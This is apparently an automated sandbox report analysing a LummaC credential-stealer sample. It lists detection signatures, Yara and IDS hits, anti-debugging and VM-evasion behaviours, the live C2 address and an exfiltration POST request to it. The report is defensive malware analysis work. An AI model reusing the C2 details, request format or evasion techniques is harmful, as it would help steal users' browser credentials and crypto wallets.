Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OlZzqwjrwO.exe

Overview

General Information

Sample name:OlZzqwjrwO.exe
renamed because original name is a hash value
Original sample name:0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e.exe
Analysis ID:1555043
MD5:30ca3a9970c190d36ef5ab08d64406e6
SHA1:fd44e251a898855a6c55e6fbd1eebbd807898052
SHA256:0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e
Tags:94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • OlZzqwjrwO.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\OlZzqwjrwO.exe" MD5: 30CA3A9970C190D36EF5AB08D64406E6)
    • WerFault.exe (PID: 4696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1250:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            0.3.OlZzqwjrwO.exe.8f0000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              0.2.OlZzqwjrwO.exe.400000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                0.3.OlZzqwjrwO.exe.8f0000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                  0.2.OlZzqwjrwO.exe.400000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:52:40.340723+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949791TCP
                    2024-11-13T10:53:17.926646+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949976TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:51:52.398965+010020432061A Network Trojan was detected192.168.2.94987394.158.244.6980TCP
                    2024-11-13T10:51:52.398965+010020432061A Network Trojan was detected192.168.2.94997894.158.244.6980TCP
                    2024-11-13T10:52:53.109411+010020432061A Network Trojan was detected192.168.2.94982294.158.244.6980TCP
                    2024-11-13T10:53:11.235764+010020432061A Network Trojan was detected192.168.2.94992394.158.244.6980TCP
                    2024-11-13T10:53:20.255878+010020432061A Network Trojan was detected192.168.2.94997494.158.244.6980TCP
                    2024-11-13T10:53:29.045691+010020432061A Network Trojan was detected192.168.2.94997794.158.244.6980TCP
                    2024-11-13T10:53:47.122818+010020432061A Network Trojan was detected192.168.2.94997994.158.244.6980TCP
                    2024-11-13T10:53:47.861590+010020432061A Network Trojan was detected192.168.2.94998094.158.244.6980TCP
                    2024-11-13T10:54:05.396672+010020432061A Network Trojan was detected192.168.2.94998194.158.244.6980TCP
                    2024-11-13T10:54:14.201356+010020432061A Network Trojan was detected192.168.2.94998294.158.244.6980TCP
                    2024-11-13T10:54:23.154328+010020432061A Network Trojan was detected192.168.2.94998394.158.244.6980TCP
                    2024-11-13T10:54:31.935365+010020432061A Network Trojan was detected192.168.2.94998494.158.244.6980TCP
                    2024-11-13T10:54:40.737248+010020432061A Network Trojan was detected192.168.2.94998594.158.244.6980TCP
                    2024-11-13T10:54:49.522715+010020432061A Network Trojan was detected192.168.2.94998694.158.244.6980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:53:47.861590+010028438641A Network Trojan was detected192.168.2.94998094.158.244.6980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
                    Source: OlZzqwjrwO.exeReversingLabs: Detection: 89%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: OlZzqwjrwO.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004052D9 CryptUnprotectData,0_2_004052D9

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeUnpacked PE file: 0.2.OlZzqwjrwO.exe.400000.0.unpack
                    Source: OlZzqwjrwO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008D216F FindFirstFileExW,0_2_008D216F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008D2223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_008D2223

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49822 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49923 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49974 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49979 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49977 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49984 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49981 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49985 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49982 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49986 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49980 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49980 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49983 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49873 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.9:49978 -> 94.158.244.69:80
                    Source: Malware configuration extractorURLs: http://94.158.244.69/c2sock
                    Source: Joe Sandbox ViewIP Address: 94.158.244.69 94.158.244.69
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49976
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49791
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownHTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16465Host: 94.158.244.69
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/4NaI
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/79Wd
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/F
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/Jihk
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/PJf
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/ZuKk
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3114597233.0000000003618000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock&
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock0LfNn/Fbj
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockF
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockS
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks4
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks~
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/i
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/nQ
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/tFkr
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/wbBA
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                    System Summary

                    barindex
                    Source: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,0_2_0040B81C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00422177 NtQueryInformationProcess,0_2_00422177
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,0_2_0040A928
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,0_2_0040B129
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042F1C2 NtClose,0_2_0042F1C2
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004244E4 NtSetInformationThread,0_2_004244E4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004224A3 NtQueryInformationProcess,0_2_004224A3
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004245EC NtQuerySystemInformation,0_2_004245EC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00421EEB NtQueryInformationProcess,0_2_00421EEB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040B7BB lstrcmpW,NtClose,0_2_0040B7BB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040B7F5 NtClose,0_2_0040B7F5
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040B81C0_2_0040B81C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042C0DA0_2_0042C0DA
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004340800_2_00434080
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040E14E0_2_0040E14E
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040A9280_2_0040A928
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040B1290_2_0040B129
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042B9C50_2_0042B9C5
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004069A10_2_004069A1
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041F9A40_2_0041F9A4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041C2700_2_0041C270
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042F2780_2_0042F278
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040620B0_2_0040620B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004302280_2_00430228
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004052D90_2_004052D9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00436ADC0_2_00436ADC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00405AAA0_2_00405AAA
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043B3620_2_0043B362
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004024760_2_00402476
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042FD350_2_0042FD35
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042AD820_2_0042AD82
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042D6580_2_0042D658
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00430E6C0_2_00430E6C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00438E280_2_00438E28
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0042CFBA0_2_0042CFBA
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041204D0_2_0041204D
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004410570_2_00441057
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004150700_2_00415070
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004488000_2_00448800
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043D8D00_2_0043D8D0
